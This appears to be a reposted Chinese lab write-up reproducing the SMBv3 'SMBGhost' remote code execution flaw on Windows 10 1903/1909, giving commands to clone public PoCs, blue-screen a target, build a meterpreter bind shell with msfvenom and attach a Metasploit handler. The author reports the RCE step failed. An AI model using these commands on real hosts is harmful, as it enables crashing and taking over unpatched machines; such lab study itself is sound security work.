失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > 永恒之黑(CVE--0796 微软SMBv3协议远程代码执行漏洞)

永恒之黑(CVE--0796 微软SMBv3协议远程代码执行漏洞)

时间:2022-03-24 22:34:54

相关推荐

永恒之黑(CVE--0796 微软SMBv3协议远程代码执行漏洞)

文章目录

一、漏洞简介:二、影响版本:三、实验环境:四、漏洞复现1.下载CVE--0796漏洞扫描工具,对网段进行扫描2.蓝屏复现3.远程执行复现

一、漏洞简介:

3月12日,微软更新安全通告针对Windows SMBv3客户端/服务器远程代码执行漏洞紧急发布了安全补丁,确定该漏洞编号为CVE--0796。

Microsoft Server Message Block 3.1.1(SMBv3)协议在处理某些请求的方式中存在代码执行漏洞。攻击者可以精心构造数据包发送到SMB服务器,无需经过身份验证,即可在目标服务器上执行任意代码。攻击者可通过部署一台恶意SMB v3服务器,并诱导用户(客户端)连接到该服务器,一旦目标用户连接,即可在计算机上执行攻击者自定义的恶意代码。

由于上述漏洞易被蠕虫利用传播恶意程序,推测可能在未来会成为恶意软件和攻击者广泛利用的漏洞,与WannaCry(5月“永恒之蓝”)漏洞较为相似。目前漏洞细节已公开,请相关用户安装补丁进行防护。

二、影响版本:

该漏洞存在于 Windows 10 版本 1903 中添加的一项新功能中。Windows 的早期版本不支持 SMBv3.1.1 压缩并且不受影响。

Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based SystemsWindows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)

三、实验环境:

靶机:192.168.159.129(Windows10 1903)

靶机:192.168.159.130(Windows10 1909).1月更新的版本

攻击机:192.168.159.131(kali -05-31)

四、漏洞复现

1.下载CVE--0796漏洞扫描工具,对网段进行扫描

下载链接:/skylar6/CVE--0796-Scanner.zip

2.蓝屏复现

下载蓝屏POCgit clone /eerykitty/CVE--0796-PoC.git安装POCpython3 setup.py install进行攻击python3 CVE--0796.py 192.168.159.130

3.远程执行复现

下载安装expgit clone /root-tools/SMBGhost_RCE_PoC生成payloadmsfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -b '\x00' -f python > exploit-p 指定 payload LPORT 目标主机执行程序后打开的侦听端口 -b 去掉坏字符,坏字符会影响 payload 正常执行。 > exploit 将生成的 payload 代码保存到文件 exploit 中 \x00 代表16进制的“00”组成的字符串。通过ASCII码换成能识别的就是:"00" - "00000000"- NUL。由于"00000000"是不可见字符,所以代码中没用。

把参数buf改为USER_PAYLOAD

替换exploit.py里的代码

执行替换后的exppython3 exploit.py -ip 192.168.159.130

启动msf监听msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcpmsf6 exploit(multi/handler) > set RHOST 192.168.159.130msf6 exploit(multi/handler) > exploit

不过,我在这里没做出来。。。无论怎么搞都是只能蓝屏不能反弹shell,懵逼ing🤾‍♀

最终效果图:

如果觉得《永恒之黑(CVE--0796 微软SMBv3协议远程代码执行漏洞)》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。